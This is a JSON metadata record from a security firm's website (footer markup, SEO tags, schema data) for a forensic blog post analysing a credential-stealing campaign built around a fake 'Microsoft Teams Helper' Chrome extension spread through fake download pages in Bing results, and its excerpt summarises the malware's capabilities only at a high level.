aria-hidden=\\&quot;true\\&quot;&gt;&lt;\\\/i&gt;&quot;,&quot;library&quot;:&quot;fa-solid&quot;}}\" data-widget_type=\"nav-menu.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t<nav aria-label=\"Menu\" class=\"elementor-nav-menu--main elementor-nav-menu__container elementor-nav-menu--layout-vertical e--pointer-none\">\n\t\t\t\t<ul id=\"menu-1-50e6031\" class=\"elementor-nav-menu sm-vertical\"><li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9146\"><a href=\"https:\/\/cirosec.de\/en\/imprint\/\" class=\"elementor-item\">Imprint<\/a><\/li>\n<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9147\"><a href=\"https:\/\/cirosec.de\/en\/privacy-policy\/\" class=\"elementor-item\">Privacy Policy<\/a><\/li>\n<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9148\"><a href=\"https:\/\/cirosec.de\/en\/cirosec-responsible-disclosure-policy\/\" class=\"elementor-item\">cirosec Responsible Disclosure Policy<\/a><\/li>\n<\/ul>\t\t\t<\/nav>\n\t\t\t\t\t\t<nav class=\"elementor-nav-menu--dropdown elementor-nav-menu__container\" aria-hidden=\"true\">\n\t\t\t\t<ul id=\"menu-2-50e6031\" class=\"elementor-nav-menu sm-vertical\"><li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9146\"><a href=\"https:\/\/cirosec.de\/en\/imprint\/\" class=\"elementor-item\" tabindex=\"-1\">Imprint<\/a><\/li>\n<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9147\"><a href=\"https:\/\/cirosec.de\/en\/privacy-policy\/\" class=\"elementor-item\" tabindex=\"-1\">Privacy Policy<\/a><\/li>\n<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9148\"><a href=\"https:\/\/cirosec.de\/en\/cirosec-responsible-disclosure-policy\/\" class=\"elementor-item\" tabindex=\"-1\">cirosec Responsible Disclosure Policy<\/a><\/li>\n<\/ul>\t\t\t<\/nav>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/footer>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>June 23, 2026 &#8211; Researchers have uncovered an evolved credential-stealing malware campaign that lures Windows users through fake software download pages appearing in Bing search results. The updated malware deploys a malicious Chrome extension disguised as &#8220;Microsoft Teams Helper,&#8221; capable of keystroke logging, real-time screen recording, cryptocurrency clipboard hijacking, and full remote code execution on the victim&#8217;s machine. <br \/> <br \/>\nAuthor: Colin Gl\u00e4tzer, Konrad Weyhing<\/p>\n","protected":false},"author":65,"featured_media":18528,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"elementor_canvas","format":"standard","meta":{"footnotes":""},"categories":[65],"tags":[69],"class_list":["post-27679","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-forensic","tag-forensik"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.9 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Analysis of a credential stealer malware campaign \u2013 Part II - cirosec<\/title>\n<meta name=\"description\" content=\"An analysis of a sophisticated malware campaign targeting Windows users via fake software sites, deploying a stealthy browser extension with keylogging, screen recording, crypto clipping, and full remote access capabilities.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/cirosec.de\/en\/news\/analysis-of-a-credential-stealer-malware-campaign-part-ii\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Analysis of a credential stealer malware campaign \u2013 Part II - cirosec\" \/>\n<meta property=\"og:description\" content=\"An analysis of a sophisticated malware campaign targeting Windows users via fake software sites, deploying a stealthy browser extension with keylogging, screen recording, crypto clipping, and full remote access capabilities.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/cirosec.de\/en\/news\/analysis-of-a-credential-stealer-malware-campaign-part-ii\/\" \/>\n<meta property=\"og:site_name\" content=\"cirosec\" \/>\n<meta property=\"article:published_time\" content=\"2026-06-23T07:34:48+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-06-24T10:04:41+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/cirosec.de\/wp-content\/uploads\/2024\/07\/krzysztof-hepner-C1JTOq_uTpY-unsplash-scaled.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"2560\" \/>\n\t<meta property=\"og:image:height\" content=\"1707\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Berater\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Berater\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"24 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/news\\\/analysis-of-a-credential-stealer-malware-campaign-part-ii\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/news\\\/analysis-of-a-credential-stealer-malware-campaign-part-ii\\\/\"},\"author\":{\"name\":\"Berater\",\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/#\\\/schema\\\/person\\\/c80daad8c190d1d501afb434439e335f\"},\"headline\":\"Analysis of a credential stealer malware campaign \u2013 Part II\",\"datePublished\":\"2026-06-23T07:34:48+00:00\",\"dateModified\":\"2026-06-24T10:04:41+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/news\\\/analysis-of-a-credential-stealer-malware-campaign-part-ii\\\/\"},\"wordCount\":3397,\"publisher\":{\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/news\\\/analysis-of-a-credential-stealer-malware-campaign-part-ii\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/cirosec.de\\\/wp-content\\\/uploads\\\/2024\\\/07\\\/krzysztof-hepner-C1JTOq_uTpY-unsplash-scaled.jpg\",\"keywords\":[\"Forensik\"],\"articleSection\":[\"Forensic\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/news\\\/analysis-of-a-credential-stealer-malware-campaign-part-ii\\\/\",\"url\":\"https:\\\/\\\/cirosec.de\\\/en\\\/news\\\/analysis-of-a-credential-stealer-malware-campaign-part-ii\\\/\",\"name\":\"Analysis of a credential stealer malware campaign \u2013 Part II - cirosec\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/news\\\/analysis-of-a-credential-stealer-malware-campaign-part-ii\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/news\\\/analysis-of-a-credential-stealer-malware-campaign-part-ii\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/cirosec.de\\\/wp-content\\\/uploads\\\/2024\\\/07\\\/krzysztof-hepner-C1JTOq_uTpY-unsplash-scaled.jpg\",\"datePublished\":\"2026-06-23T07:34:48+00:00\",\"dateModified\":\"2026-06-24T10:04:41+00:00\",\"description\":\"An analysis of a sophisticated malware campaign targeting Windows users via fake software sites, deploying a stealthy browser extension with keylogging, screen recording, crypto clipping, and full remote access capabilities.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/news\\\/analysis-of-a-credential-stealer-malware-campaign-part-ii\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/cirosec.de\\\/en\\\/news\\\/analysis-of-a-credential-stealer-malware-campaign-part-ii\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/news\\\/analysis-of-a-credential-stealer-malware-campaign-part-ii\\\/#primaryimage\",\"url\":\"https:\\\/\\\/cirosec.de\\\/wp-content\\\/uploads\\\/2024\\\/07\\\/krzysztof-hepner-C1JTOq_uTpY-unsplash-scaled.jpg\",\"contentUrl\":\"https:\\\/\\\/cirosec.de\\\/wp-content\\\/uploads\\\/2024\\\/07\\\/krzysztof-hepner-C1JTOq_uTpY-unsplash-scaled.jpg\",\"width\":2560,\"height\":1707},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/news\\\/analysis-of-a-credential-stealer-malware-campaign-part-ii\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Startseite\",\"item\":\"https:\\\/\\\/cirosec.de\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Analysis of a credential stealer malware campaign \u2013 Part II\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/#website\",\"url\":\"https:\\\/\\\/cirosec.de\\\/en\\\/\",\"name\":\"cirosec\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/cirosec.de\\\/en\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/#organization\",\"name\":\"cirosec\",\"url\":\"https:\\\/\\\/cirosec.de\\\/en\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/cirosec.de\\\/wp-content\\\/uploads\\\/2023\\\/08\\\/Logo_Cirosec_rgb_53x16mm-transparent.png\",\"contentUrl\":\"https:\\\/\\\/cirosec.de\\\/wp-content\\\/uploads\\\/2023\\\/08\\\/Logo_Cirosec_rgb_53x16mm-transparent.png\",\"width\":626,\"height\":188,\"caption\":\"cirosec\"},\"image\":{\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/#\\\/schema\\\/person\\\/c80daad8c190d1d501afb434439e335f\",\"name\":\"Berater\",\"url\":\"https:\\\/\\\/cirosec.de\\\/en\\\/news\\\/author\\\/berater\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Analysis of a credential stealer malware campaign \u2013 Part II - cirosec","description":"An analysis of a sophisticated malware campaign targeting Windows users via fake software sites, deploying a stealthy browser extension with keylogging, screen recording, crypto clipping, and full remote access capabilities.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/cirosec.de\/en\/news\/analysis-of-a-credential-stealer-malware-campaign-part-ii\/","og_locale":"en_US","og_type":"article","og_title":"Analysis of a credential stealer malware campaign \u2013 Part II - cirosec","og_description":"An analysis of a sophisticated malware campaign targeting Windows users via fake software sites, deploying a stealthy browser extension with keylogging, screen recording, crypto clipping, and full remote access capabilities.","og_url":"https:\/\/cirosec.de\/en\/news\/analysis-of-a-credential-stealer-malware-campaign-part-ii\/","og_site_name":"cirosec","article_published_time":"2026-06-23T07:34:48+00:00","article_modified_time":"2026-06-24T10:04:41+00:00","og_image":[{"width":2560,"height":1707,"url":"https:\/\/cirosec.de\/wp-content\/uploads\/2024\/07\/krzysztof-hepner-C1JTOq_uTpY-unsplash-scaled.jpg","type":"image\/jpeg"}],"author":"Berater","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Berater","Est. reading time":"24 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/cirosec.de\/en\/news\/analysis-of-a-credential-stealer-malware-campaign-part-ii\/#article","isPartOf":{"@id":"https:\/\/cirosec.de\/en\/news\/analysis-of-a-credential-stealer-malware-campaign-part-ii\/"},"author":{"name":"Berater","@id":"https:\/\/cirosec.de\/en\/#\/schema\/person\/c80daad8c190d1d501afb434439e335f"},"headline":"Analysis of a credential stealer malware campaign \u2013 Part II","datePublished":"2026-06-23T07:34:48+00:00","dateModified":"2026-06-24T10:04:41+00:00","mainEntityOfPage":{"@id":"https:\/\/cirosec.de\/en\/news\/analysis-of-a-credential-stealer-malware-campaign-part-ii\/"},"wordCount":3397,"publisher":{"@id":"https:\/\/cirosec.de\/en\/#organization"},"image":{"@id":"https:\/\/cirosec.de\/en\/news\/analysis-of-a-credential-stealer-malware-campaign-part-ii\/#primaryimage"},"thumbnailUrl":"https:\/\/cirosec.de\/wp-content\/uploads\/2024\/07\/krzysztof-hepner-C1JTOq_uTpY-unsplash-scaled.jpg","keywords":["Forensik"],"articleSection":["Forensic"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/cirosec.de\/en\/news\/analysis-of-a-credential-stealer-malware-campaign-part-ii\/","url":"https:\/\/cirosec.de\/en\/news\/analysis-of-a-credential-stealer-malware-campaign-part-ii\/","name":"Analysis of a credential stealer malware campaign \u2013 Part II - cirosec","isPartOf":{"@id":"https:\/\/cirosec.de\/en\/#website"},"primaryImageOfPage":{"@id":"https:\/\/cirosec.de\/en\/news\/analysis-of-a-credential-stealer-malware-campaign-part-ii\/#primaryimage"},"image":{"@id":"https:\/\/cirosec.de\/en\/news\/analysis-of-a-credential-stealer-malware-campaign-part-ii\/#primaryimage"},"thumbnailUrl":"https:\/\/cirosec.de\/wp-content\/uploads\/2024\/07\/krzysztof-hepner-C1JTOq_uTpY-unsplash-scaled.jpg","datePublished":"2026-06-23T07:34:48+00:00","dateModified":"2026-06-24T10:04:41+00:00","description":"An analysis of a sophisticated malware campaign targeting Windows users via fake software sites, deploying a stealthy browser extension with keylogging, screen recording, crypto clipping, and full remote access capabilities.","breadcrumb":{"@id":"https:\/\/cirosec.de\/en\/news\/analysis-of-a-credential-stealer-malware-campaign-part-ii\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/cirosec.de\/en\/news\/analysis-of-a-credential-stealer-malware-campaign-part-ii\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/cirosec.de\/en\/news\/analysis-of-a-credential-stealer-malware-campaign-part-ii\/#primaryimage","url":"https:\/\/cirosec.de\/wp-content\/uploads\/2024\/07\/krzysztof-hepner-C1JTOq_uTpY-unsplash-scaled.jpg","contentUrl":"https:\/\/cirosec.de\/wp-content\/uploads\/2024\/07\/krzysztof-hepner-C1JTOq_uTpY-unsplash-scaled.jpg","width":2560,"height":1707},{"@type":"BreadcrumbList","@id":"https:\/\/cirosec.de\/en\/news\/analysis-of-a-credential-stealer-malware-campaign-part-ii\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Startseite","item":"https:\/\/cirosec.de\/"},{"@type":"ListItem","position":2,"name":"Analysis of a credential stealer malware campaign \u2013 Part II"}]},{"@type":"WebSite","@id":"https:\/\/cirosec.de\/en\/#website","url":"https:\/\/cirosec.de\/en\/","name":"cirosec","description":"","publisher":{"@id":"https:\/\/cirosec.de\/en\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/cirosec.de\/en\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/cirosec.de\/en\/#organization","name":"cirosec","url":"https:\/\/cirosec.de\/en\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/cirosec.de\/en\/#\/schema\/logo\/image\/","url":"https:\/\/cirosec.de\/wp-content\/uploads\/2023\/08\/Logo_Cirosec_rgb_53x16mm-transparent.png","contentUrl":"https:\/\/cirosec.de\/wp-content\/uploads\/2023\/08\/Logo_Cirosec_rgb_53x16mm-transparent.png","width":626,"height":188,"caption":"cirosec"},"image":{"@id":"https:\/\/cirosec.de\/en\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/cirosec.de\/en\/#\/schema\/person\/c80daad8c190d1d501afb434439e335f","name":"Berater","url":"https:\/\/cirosec.de\/en\/news\/author\/berater\/"}]}},"_links":{"self":[{"href":"https:\/\/cirosec.de\/en\/wp-json\/wp\/v2\/posts\/27679","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cirosec.de\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cirosec.de\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/cirosec.de\/en\/wp-json\/wp\/v2\/users\/65"}],"replies":[{"embeddable":true,"href":"https:\/\/cirosec.de\/en\/wp-json\/wp\/v2\/comments?post=27679"}],"version-history":[{"count":38,"href":"https:\/\/cirosec.de\/en\/wp-json\/wp\/v2\/posts\/27679\/revisions"}],"predecessor-version":[{"id":27847,"href":"https:\/\/cirosec.de\/en\/wp-json\/wp\/v2\/posts\/27679\/revisions\/27847"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cirosec.de\/en\/wp-json\/wp\/v2\/media\/18528"}],"wp:attachment":[{"href":"https:\/\/cirosec.de\/en\/wp-json\/wp\/v2\/media?parent=27679"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cirosec.de\/en\/wp-json\/wp\/v2\/categories?post=27679"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cirosec.de\/en\/wp-json\/wp\/v2\/tags?post=27679"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}